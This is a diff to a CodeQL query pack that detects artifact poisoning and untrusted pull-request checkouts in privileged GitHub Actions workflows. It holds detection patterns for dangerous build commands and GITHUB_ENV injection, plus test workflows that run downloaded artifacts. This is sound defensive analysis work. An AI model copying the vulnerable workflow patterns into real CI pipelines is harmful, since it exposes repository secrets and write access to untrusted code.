b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -3,6 +3,7 @@ private import codeql.actions.TaintTracking import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources +import codeql.actions.security.PoisonableSteps string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } @@ -228,81 +229,19 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { } } -abstract class PoisonableStep extends Step { } - -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 -private string dangerousActions() { - result = - ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] -} - -class DangerousActionUsesStep extends PoisonableStep, UsesStep { - DangerousActionUsesStep() { - exists(UntrustedArtifactDownloadStep step | - step.getAFollowingStep() = this and - this.getCallee() = dangerousActions() - ) - } -} - -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 -private string dangerousCommands() { - result = - [ - "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", - "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", - "^ant ", "mkdocs build", "pytest" - ] -} - -class BuildRunStep extends PoisonableStep, Run { - BuildRunStep() { - exists(UntrustedArtifactDownloadStep step | - step.getAFollowingStep() = this and - exists( - this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) - ) - ) - } -} - -class LocalCommandExecutionRunStep extends PoisonableStep, Run { - LocalCommandExecutionRunStep() { - exists(UntrustedArtifactDownloadStep step | - step.getAFollowingStep() = this and - // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, ... - exists( - this.getScript() - .splitAt("\n") - .trim() - .regexpFind("([^a-z]|^)(./|(ba|z|fi)?sh\\s+)" + step.getPath(), _, _) - ) - ) - } -} - -class EnvVarInjectionRunStep extends PoisonableStep, Run { - EnvVarInjectionRunStep() { - exists(UntrustedArtifactDownloadStep step, string value | - step.getAFollowingStep() = this and - // Heuristic: - // Run step with env var definition based on file content. - // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - // eg: `echo "sha=$(> $GITHUB_ENV` - Utils::writeToGitHubEnv(this, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) - } -} - class ArtifactPoisoningSink extends DataFlow::Node { ArtifactPoisoningSink() { - exists(PoisonableStep step | - step.(Run).getScriptScalar() = this.asExpr() or - step.(UsesStep) = this.asExpr() + exists(UntrustedArtifactDownloadStep download, PoisonableStep poisonable | + download.getAFollowingStep() = poisonable and + ( + poisonable.(Run).getScriptScalar() = this.asExpr() + or + poisonable.(UsesStep) = this.asExpr() + ) and + ( + not poisonable instanceof LocalCommandExecutionRunStep or + poisonable.(LocalCommandExecutionRunStep).getCommand().matches(download.getPath() + "%") + ) ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll new file mode 100644 index 00000000000..130879a7cb6 --- /dev/null +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -0,0 +1,64 @@ +import actions + +abstract class PoisonableStep extends Step { } + +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 +private string dangerousActions() { + result = + ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] +} + +class DangerousActionUsesStep extends PoisonableStep, UsesStep { + DangerousActionUsesStep() { this.getCallee() = dangerousActions() } +} + +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 +private string dangerousCommands() { + result = + [ + "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", + "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", + "^ant ", "mkdocs build", "pytest" + ] +} + +class BuildRunStep extends PoisonableStep, Run { + BuildRunStep() { + exists( + this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) + ) + } +} + +class LocalCommandExecutionRunStep extends PoisonableStep, Run { + string cmd; + + LocalCommandExecutionRunStep() { + // Heuristic: + // Run step with a command starting with `./xxxx`, `sh xxxx`, ... + exists(string line | line = this.getScript().splitAt("\n").trim() | + // ./xxxx + cmd = line.regexpCapture("(^|\\s+)\\.\\/(.*)", 2) + or + // sh xxxx + cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3) + ) + } + + string getCommand() { result = cmd } +} + +class EnvVarInjectionRunStep extends PoisonableStep, Run { + EnvVarInjectionRunStep() { + exists(string value | + // Heuristic: + // Run step with env var definition based on file content. + // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` + // eg: `echo "sha=$(> $GITHUB_ENV` + Utils::writeToGitHubEnv(this, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } +} diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll new file mode 100644 index 00000000000..c677915f504 --- /dev/null +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -0,0 +1,229 @@ +import actions +import codeql.actions.DataFlow + +bindingset[s] +predicate containsPullRequestNumber(string s) { + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.number\\b", "\\bgithub\\.event\\.issue\\.number\\b", + "\\bgithub\\.event\\.pull_request\\.id\\b", + "\\bgithub\\.event\\.pull_request\\.number\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", + // heuristics + "\\bpr_number\\b", "\\bpr_id\\b" + ], _, _) + ) +} + +bindingset[s] +predicate containsHeadSHA(string s) { + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", + "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_suite\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + // heuristics + "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b" + ], _, _) + ) +} + +bindingset[s] +predicate containsHeadRef(string s) { + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b", + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + // heuristics + "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", + // env vars + "\\benv\\.GITHUB_HEAD_REF\\b", + ], _, _) + ) +} + +/** Checkout of a Pull Request HEAD ref */ +abstract class PRHeadCheckoutStep extends Step { } + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep { + ActionsMutableRefCheckout() { + this.getCallee() = "actions/checkout" and + ( + // ref argument contains the PR id/number or head ref/sha + exists(Expression e | + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) and + DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) + ) + or + // 3rd party actions returning the PR head sha/ref + exists(UsesStep step | + step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + // TODO: This should be read step of the head_sha or head_ref output vars + this.getArgument("ref").regexpMatch(".*head_ref.*") and + DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + ) + or + // heuristic base on the step id and field name + exists(StepsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getStepId().matches(["%ref%", "%branch%"]) or + e.getFieldName().matches(["%ref%", "%branch%"]) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep { + ActionsSHACheckout() { + this.getCallee() = "actions/checkout" and + ( + // ref argument contains the PR id/number or head ref/sha + exists(Expression e | + containsHeadSHA(e.getExpression()) and + DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) + ) + or + // 3rd party actions returning the PR head sha/ref + exists(UsesStep step | + step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + this.getArgument("ref").regexpMatch(".*head_sha.*") and + DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + ) + or + // heuristic base on the step id and field name + exists(StepsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getStepId().matches(["%sha%", "%commit%"]) or + e.getFieldName().matches(["%sha%", "%commit%"]) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { + GitMutableRefCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*git\\s+(fetch|pull).*") and + ( + (containsHeadRef(line) or containsPullRequestNumber(line)) + or + exists(string varname, string expr | + expr = this.getInScopeEnvVarExpr(varname).getExpression() and + ( + containsHeadRef(expr) or + containsPullRequestNumber(expr) + ) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitSHACheckout extends PRHeadCheckoutStep instanceof Run { + GitSHACheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*git\\s+(fetch|pull).*") and + ( + containsHeadSHA(line) + or + exists(string varname, string expr | + expr = this.getInScopeEnvVarExpr(varname).getExpression() and + containsHeadSHA(expr) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { + GhMutableRefCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + ( + (containsHeadRef(line) or containsPullRequestNumber(line)) + or + exists(string varname | + ( + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) or + containsPullRequestNumber(this.getInScopeEnvVarExpr(varname).getExpression()) + ) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhSHACheckout extends PRHeadCheckoutStep instanceof Run { + GhSHACheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + ( + containsHeadSHA(line) + or + exists(string varname | + containsHeadSHA(this.getInScopeEnvVarExpr(varname).getExpression()) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + +/** An If node that contains an actor, user or label check */ +class ControlCheck extends If { + ControlCheck() { + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", // actor + "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user + "\\bgithub\\.event\\.pull_request\\.labels\\b", // label + "\\bgithub\\.event\\.label\\.name\\b" // label + ], _, _) + ) + } +} diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3800ce9e85c..380cfdbd858 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.19 +version: 0.0.20 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql deleted file mode 100644 index c9cbb0ab13c..00000000000 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ /dev/null @@ -1,150 +0,0 @@ -/** - * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. - * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment - * that is able to push to the base repository and to access secrets. - * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 9.3 - * @id actions/untrusted-checkout - * @tags actions - * security - * external/cwe/cwe-829 - */ - -import actions -import codeql.actions.DataFlow - -/** An If node that contains an actor, user or label check */ -class ControlCheck extends If { - ControlCheck() { - exists( - Utils::normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.actor\\b", // actor - "\\bgithub\\.triggering_actor\\b", // actor - "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.labels\\b", // label - "\\bgithub\\.event\\.label\\.name\\b" // label - ], _, _) - ) - } -} - -bindingset[s] -predicate containsHeadRef(string s) { - exists( - Utils::normalizeExpr(s) - .regexpFind([ - "\\bgithub\\.event\\.number\\b", // The pull request number. - "\\bgithub\\.event\\.issue\\.number\\b", // The pull request number on issue_comment. - "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. - "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. - "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. - "\\bgithub\\.event\\.pull_request\\.number\\b", // The pull request number. - "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", // The SHA of the merge commit. - "\\bgithub\\.head_ref\\b", // The head_ref or source branch of the pull request in a workflow run. - "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. - "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. - "\\benv\\.GITHUB_HEAD_REF\\b", "\\bgithub\\.event\\.check_suite\\.after\\b", - "\\bgithub\\.event\\.check_suite\\.head_sha\\b", - "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", - "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", - "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", - "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.head_sha\\b", - "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", - "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", - "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", - "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", - // heuristics - "\\bhead\\.sha\\b", "\\bhead\\.ref\\b", "\\bpr_number\\b", "\\bpr_head_sha\\b" - ], _, _) - ) -} - -/** Checkout of a Pull Request HEAD ref */ -abstract class PRHeadCheckoutStep extends Step { } - -/** Checkout of a Pull Request HEAD ref using actions/checkout action */ -class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { - ActionsCheckout() { - this.getCallee() = "actions/checkout" and - ( - // ref argument contains the head ref - exists(Expression e | - containsHeadRef(e.getExpression()) and - DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) - ) - or - // 3rd party actions returning the PR head sha/ref - exists(UsesStep head | - head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and - DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) - ) - or - // heuristic base on the step id and field name - exists(StepsExpression e | - this.getArgumentExpr("ref") = e and - ( - e.getStepId().matches(["%sha%", "%head%", "branch"]) or - e.getFieldName().matches(["%sha%", "%head%", "branch"]) - ) - ) - ) - } -} - -/** Checkout of a Pull Request HEAD ref using git within a Run step */ -class GitCheckout extends PRHeadCheckoutStep instanceof Run { - GitCheckout() { - exists(string line | - this.getScript().splitAt("\n") = line and - line.regexpMatch(".*git\\s+fetch.*") and - ( - containsHeadRef(line) - or - exists(string varname | - containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and - exists(line.regexpFind(varname, _, _)) - ) - ) - ) - } -} - -/** Checkout of a Pull Request HEAD ref using gh within a Run step */ -class GhCheckout extends PRHeadCheckoutStep instanceof Run { - GhCheckout() { - exists(string line | - this.getScript().splitAt("\n") = line and - line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and - ( - containsHeadRef(line) - or - exists(string varname | - containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and - exists(line.regexpFind(varname, _, _)) - ) - ) - ) - } -} - -from Workflow w, PRHeadCheckoutStep checkout -where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) -select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.md b/ql/src/Security/CWE-829/UntrustedCheckoutError.md similarity index 100% rename from ql/src/Security/CWE-829/UntrustedCheckout.md rename to ql/src/Security/CWE-829/UntrustedCheckoutError.md diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql b/ql/src/Security/CWE-829/UntrustedCheckoutError.ql new file mode 100644 index 00000000000..604acf71cc7 --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutError.ql @@ -0,0 +1,28 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/untrusted-checkout + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from Workflow w, PRHeadCheckoutStep checkout +where + w.isPrivileged() and + w.getAJob().(LocalJob).getAStep() = checkout and + checkout.getAFollowingStep() instanceof PoisonableStep and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql new file mode 100644 index 00000000000..d8dfd69ad28 --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql @@ -0,0 +1,28 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 5.3 + * @id actions/untrusted-checkout + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from Workflow w, PRHeadCheckoutStep checkout +where + w.isPrivileged() and + w.getAJob().(LocalJob).getAStep() = checkout and + not checkout.getAFollowingStep() instanceof PoisonableStep and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c431636c96a..c5a94e35d4b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.19 +version: 0.0.20 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index 2f39bfd307a..e73548895d3 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml @@ -17,7 +17,7 @@ jobs: path: foo - name: Run command run: | - ./foo/cmd + sh foo/cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index 31fa3017551..ac970fff840 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -15,7 +15,7 @@ jobs: name: artifact_name workflow: wf.yml - name: Run command - run: ./cmd + run: sh cmd diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 3d1df408c3b..193eee3b66c 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -1,8 +1,8 @@ edges | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | @@ -18,9 +18,9 @@ nodes | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index 5bea5c7e52c..2819bf62fdf 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected @@ -1,8 +1,8 @@ edges | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | @@ -18,9 +18,9 @@ nodes | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | @@ -43,8 +43,8 @@ subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact 